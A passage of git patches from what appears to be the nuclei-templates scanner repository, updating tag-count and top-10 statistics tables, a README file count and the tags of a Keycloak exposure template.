plugin | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | | kerbynet | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| key | 1 | | | | | | | | | | st | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| skycaiji | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | | actuator | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | | autocomplete | 1 | | | | | | | | | | zmanda | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| manager | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| graph | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| mapbox | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| weather | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| placeos | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| route | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| stripe | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| sendgrid | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| newrelic | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | | oidc | 1 | | | | | | | | | -| elevation | 1 | | | | | | | | | -| syslog | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e941b1bca2..7c569d4d19 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | From 7bf2b8377818af0789011cb668bf056be9ed3f46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:30:47 +0000 Subject: [PATCH 27/54] Auto README Update [Mon Oct 18 15:30:47 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e60fe58f03..7c8bd1cd86 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2376 files**. +**176 directories, 2381 files**. From aec00d0d1137fed4cf3f6d3e76be666211ff816b Mon Sep 17 00:00:00 2001 From: opp? <50470310+oppsec@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:38:04 -0300 Subject: [PATCH 28/54] add more tags to keycloak json file template --- exposures/files/keycloak-json.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/keycloak-json.yaml b/exposures/files/keycloak-json.yaml index da1532a209..5a557e754a 100644 --- a/exposures/files/keycloak-json.yaml +++ b/exposures/files/keycloak-json.yaml @@ -3,7 +3,7 @@ info: name: Keycloak Json File author: oppsec severity: info - tags: exposure + tags: exposure,keycloak,config requests: - method: GET From c7efad4b58c8f3e818235cf3bc1d508a341b9a95 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:35:04 -0500 Subject: [PATCH 29/54] Create prometheus-config-endpoint.yaml --- .../configs/prometheus-config-endpoint.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/prometheus-config-endpoint.yaml diff --git 